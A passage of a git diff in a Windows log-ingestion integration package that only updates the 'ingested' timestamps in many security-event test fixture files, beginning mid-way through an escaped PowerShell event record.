Name='Path'\u003e\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e\n\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-PowerShell' Guid='{a0c1853b-5c40-4b15-8766-3cf1c58f985a}'/\u003e\u003cEventID\u003e4104\u003c/EventID\u003e\u003cVersion\u003e1\u003c/Version\u003e\u003cLevel\u003e5\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e15\u003c/Opcode\u003e\u003cKeywords\u003e0x0\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-14T11:33:51.393884800Z'/\u003e\u003cEventRecordID\u003e3582\u003c/EventRecordID\u003e\u003cCorrelation ActivityID='{fb13c9de-29f7-0000-79db-13fbf729d601}'/\u003e\u003cExecution ProcessID='4844' ThreadID='4428'/\u003e\u003cChannel\u003eMicrosoft-Windows-PowerShell/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-21-1350058589-2282154016-2764056528-1000'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='MessageNumber'\u003e1\u003c/Data\u003e\u003cData Name='MessageTotal'\u003e1\u003c/Data\u003e\u003cData Name='ScriptBlockText'\u003e\u003c/Data\u003e\u003cData Name='ScriptBlockId'\u003ef5521cbd-656e-4296-b74d-9ffb4eec23b0\u003c/Data\u003e\u003cData Name='Path'\u003eC:\\Users\\vagrant\\Desktop\\patata.ps1\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-PowerShell", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json index ea7e43f5061..ab2b941ceb7 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1100.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.474348700Z", + "ingested": "2021-12-09T13:49:19.558723400Z", "code": "1100", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json index 525b5c4f900..4379d1339aa 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1102.json-expected.json @@ -58,7 +58,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.580222Z", + "ingested": "2021-12-09T13:49:19.713823200Z", "code": "1102", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json index 664388c55b4..8ffc31b1602 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1104.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.727423800Z", + "ingested": "2021-12-09T13:49:19.942134900Z", "code": "1104", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json index a34cfa67580..c853233334b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-1105.json-expected.json @@ -48,7 +48,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:37.823729Z", + "ingested": "2021-12-09T13:49:20.094475800Z", "code": "1105", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json index 77c9b043526..79c55bc7fa3 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4670-windowssrv2016.json-expected.json @@ -73,7 +73,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:37.931030700Z", + "ingested": "2021-12-09T13:49:20.259672100Z", "code": "4670", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json index d4806fc81f6..eca02db6f6b 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4706-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.117594800Z", + "ingested": "2021-12-09T13:49:20.536429600Z", "code": "4706", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json index da67dee199d..f736e4bffb1 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4707-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.264733800Z", + "ingested": "2021-12-09T13:49:20.783827300Z", "code": "4707", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json index 43ac396baf7..06701098979 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4713-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.384542Z", + "ingested": "2021-12-09T13:49:21.000818800Z", "code": "4713", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json index 1da22d4c2ab..d7d461105a0 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4716-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.521696600Z", + "ingested": "2021-12-09T13:49:21.215352400Z", "code": "4716", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json index e5df4698d53..918efde2780 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4717-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-06-14T13:22:38.676440100Z", + "ingested": "2021-12-09T13:49:21.448485700Z", "code": "4717", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json index 9ee7ad3c102..b06e2d07153 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4718-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-06-14T13:22:38.797606800Z", + "ingested": "2021-12-09T13:49:21.686161200Z", "code": "4718", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json index 0bed3b39389..72aa79bbc99 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:38.919300Z", + "ingested": "2021-12-09T13:49:21.922092300Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json index 7f51c9617a6..643dd43d001 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4719.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:39.055780900Z", + "ingested": "2021-12-09T13:49:22.158931800Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json index ad644b18321..0411434ab67 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4739-windowssrv2016.json-expected.json @@ -66,7 +66,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:39.209969500Z", + "ingested": "2021-12-09T13:49:22.386517Z", "code": "4739", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json index 87c4f455b75..c1c4261d6b5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4743.json-expected.json @@ -68,7 +68,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.359938300Z", + "ingested": "2021-12-09T13:49:22.618861600Z", "code": "4743", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json index bc12d4d5006..3b3ab546d15 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4744.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.496809300Z", + "ingested": "2021-12-09T13:49:22.888830Z", "code": "4744", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json index 8c7e354b775..8d7722f421a 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4745.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.664588Z", + "ingested": "2021-12-09T13:49:23.142370200Z", "code": "4745", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json index da3a343adfc..d467909b836 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.818276800Z", + "ingested": "2021-12-09T13:49:23.385857700Z", "code": "4746", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json index 82ebaa8f4ed..a441421a6e5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4747.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:39.969342600Z", + "ingested": "2021-12-09T13:49:23.679961Z", "code": "4747", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json index 1e7cad0a197..461e6aba397 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4748.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.116998500Z", + "ingested": "2021-12-09T13:49:23.991318600Z", "code": "4748", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json index 24a5d1e398f..e3e8effd983 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4749.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.260503600Z", + "ingested": "2021-12-09T13:49:24.244081200Z", "code": "4749", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json index b4c5ecd7781..b477cb2947e 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4750.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.407747300Z", + "ingested": "2021-12-09T13:49:24.483829100Z", "code": "4750", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json index 4ee3c8c8932..ecb37b97843 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4751.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.552835500Z", + "ingested": "2021-12-09T13:49:24.727114100Z", "code": "4751", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json index 35bc0a222e4..90de6a84a95 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4752.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.705450400Z", + "ingested": "2021-12-09T13:49:25.031682700Z", "code": "4752", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json index 07cd4d8a8fe..b27ceb6bdd7 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4753.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:40.875381200Z", + "ingested": "2021-12-09T13:49:25.348788400Z", "code": "4753", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json index cb7bb05558d..40bcc2ccb38 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4759.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.022353700Z", + "ingested": "2021-12-09T13:49:25.584313500Z", "code": "4759", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json index b6cef3908dc..bac0357a6d5 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4760.json-expected.json @@ -63,7 +63,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.163968Z", + "ingested": "2021-12-09T13:49:25.827742800Z", "code": "4760", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json index 830f175c950..7621713a598 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4761.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.310809800Z", + "ingested": "2021-12-09T13:49:26.083510200Z", "code": "4761", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json index 18217f95c92..4d76b9f7e09 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4762.json-expected.json @@ -64,7 +64,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.465874200Z", + "ingested": "2021-12-09T13:49:26.396143700Z", "code": "4762", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json index f25dfa4ea58..cb52d9e625c 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4763.json-expected.json @@ -61,7 +61,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:41.624591400Z", + "ingested": "2021-12-09T13:49:26.696546700Z", "code": "4763", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json index d584f109a61..c6cdaa5b703 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4817-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:41.755705200Z", + "ingested": "2021-12-09T13:49:26.934347800Z", "code": "4817", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json index 8f0a5b63070..2ecf8543a3d 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4902-windowssrv2016.json-expected.json @@ -47,7 +47,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:41.908411200Z", + "ingested": "2021-12-09T13:49:27.170161Z", "code": "4902", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json index 32a52f27117..17330065c39 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4904-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.012244400Z", + "ingested": "2021-12-09T13:49:27.330318200Z", "code": "4904", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json index d04eae63429..15487ba6959 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4905-windowssrv2016.json-expected.json @@ -65,7 +65,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.151342300Z", + "ingested": "2021-12-09T13:49:27.587226700Z", "code": "4905", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json index ec5895acb58..b6f2b5af795 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4906-windowssrv2016.json-expected.json @@ -46,7 +46,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.279872Z", + "ingested": "2021-12-09T13:49:27.825407300Z", "code": "4906", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json index 1ae33913f9b..4168d754b87 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4907-windowssrv2016.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-06-14T13:22:42.389168900Z", + "ingested": "2021-12-09T13:49:27.985693600Z", "code": "4907", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json index df01b643952..c5598dcd88c 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4673.json-expected.json @@ -67,7 +67,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:42.527294Z", + "ingested": "2021-12-09T13:49:28.241198500Z", "code": "4673", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json index 3c0fa33b09e..b642bbc77e9 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4697.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-06-14T13:22:42.667343400Z", + "ingested": "2021-12-09T13:49:28.487503600Z", "code": "4697", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json index 4edc9d5ee98..12b89d56426 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4768.json-expected.json @@ -77,7 +77,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:42.801490800Z", + "ingested": "2021-12-09T13:49:28.747988200Z", "code": "4768", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json index b33a5b6a8a7..ddb7c263c3c 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4769.json-expected.json @@ -76,7 +76,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-06-14T13:22:42.955334100Z", + "ingested": "2021-12-09T13:49:29.009644600Z", "code": "4769", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json index 52da86a8fa9..d7d7e222ed9 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-windows2012-4770.json-expected.json @@ -71,7 +71,7 @@ "name": 